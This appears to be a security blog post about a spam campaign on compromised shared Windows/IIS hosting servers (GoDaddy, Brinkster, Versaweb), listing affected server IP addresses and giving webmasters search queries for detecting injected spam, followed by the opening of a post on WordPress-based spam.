Those 49 servers are shared Windows servers with thousands of sites. For example, Domaintools.com says 2,050 sites use the 184.168.152.150 address. The websites I checked belong to different users so it’s not just a matter of individual compromised accounts. And the websites are quite heterogeneous – ASP, PHP, pure HTML, etc. so it doesn’t look like a common web application vulnerability either. It looks like those servers have been pwned by hackers who now have access to most user accounts there. Given that we have almost 50 known such Windows servers on the GoDaddy network, this may mean some infrastructure level problems or at least common Windows server security configuration issues.

The rest of the servers typically have one or very few websites (I suppose either dedicated servers or IPs) so they don’t affect this hypothesis.

Some of the Brinkster and Versaweb servers also have this issue:

65.182.100.172
65.182.100.177
65.182.100.186
65.182.100.191
65.182.100.88
65.182.101.106
65.182.101.150
65.182.101.152
65.182.101.206
65.182.101.207
65.182.101.41
65.182.101.60

76.164.226.242
76.164.226.243
76.164.226.244
76.164.226.245
76.164.226.246

It’s still not clear why all websites on those servers have not been infected (or have they been cleaned already?). Maybe hackers infected them semi-manually, so just a few hundred infected websites was good enough for them?

When checking random websites on the compromised servers I noticed that some of them used very old versions of CMS’s (e.g. 4 year old WordPress). Maybe such websites were the penetration points that helped hackers compromise the whole servers later?

I also know that hackers install PHP wrapper scripts on pure HTML sites. For example, it’s typical to see a default.php working instead of index.html when you request a homepage. This wrapper script explains why you see the injected script at the very top of the HTML code and how hackers manage to implement “cloaking” on pure HTML sites.

At this point, I can only see the following things in common on the servers used in this spam campaign:

  • Windows
  • IIS (usually an old version)
  • PHP support

I wonder if this combination has a known security hole that allows to pwn server?

To Webmasters

This time I’d like to reach out to webmasters who host their websites on shared Windows servers. Especially to GoDaddy clients.

Please Check Your Websites ASAP!

You can start with free online scanners like Sucuri SiteCheck and Unmask Parasites,

Then check search results for your website on Google (the “site:” operator), where you should look for unexpected keywords in your page titles and descriptions. Make sure to check “cached” copies that Google store for your site. Then add the following keywords to your “site:” search that may help your spot more web spam:

  • site:yourdomain.com cheap
  • site:yourdomain.com buy online
  • site:yourdomain.com “cyber monday”
  • site:yourdomain.com “black friday”
  • site:yourdomain.com outlet

Then you might want to figure out if your server looks compromised. First, identify your website’s IP address. You can use commands like ping or host, you can enter your domain name on a website like whois.domaintools.com, or you can at least ask your hosting provider. With your IP, you can then use the Bing‘s “ip:” search along with some spammy keywords.

Here are a few searches that I suggest you can try:

ip:ip address cyber monday
ip:ip address black friday
ip:ip address ”beat by dre cheap”
ip:ip address ”Cheap Louis Vuitton”
ip:ip address viagra online
ip:ip address payday loans
ip:ip address “order cialis online”

If you see many results from different websites, you might want to ask your hosting provider what’s going on there, and if the server is really secure.

We are currently contacting hosting providers so they can address this issue…

Leveraging the WordPress Platform for SPAM

We’ve all seen WordPress comment and pingback spam, but thanks to strict moderation regimes and brilliant WordPress plugins that focus strictly on SPAM comments, comment spam isn’t a major problem for most websites these days. I have seen however, a new trend starting to emerge when it comes to spam involving WordPress.

In recent years WordPress has become the go-to platform for people looking to start their own website. It is easily installed and set-up, relatively light on resources, and has a high level of functionality. This feature list is not only appealing to everyday users, it is also appealing to spammers for the exact same reasons.


Read More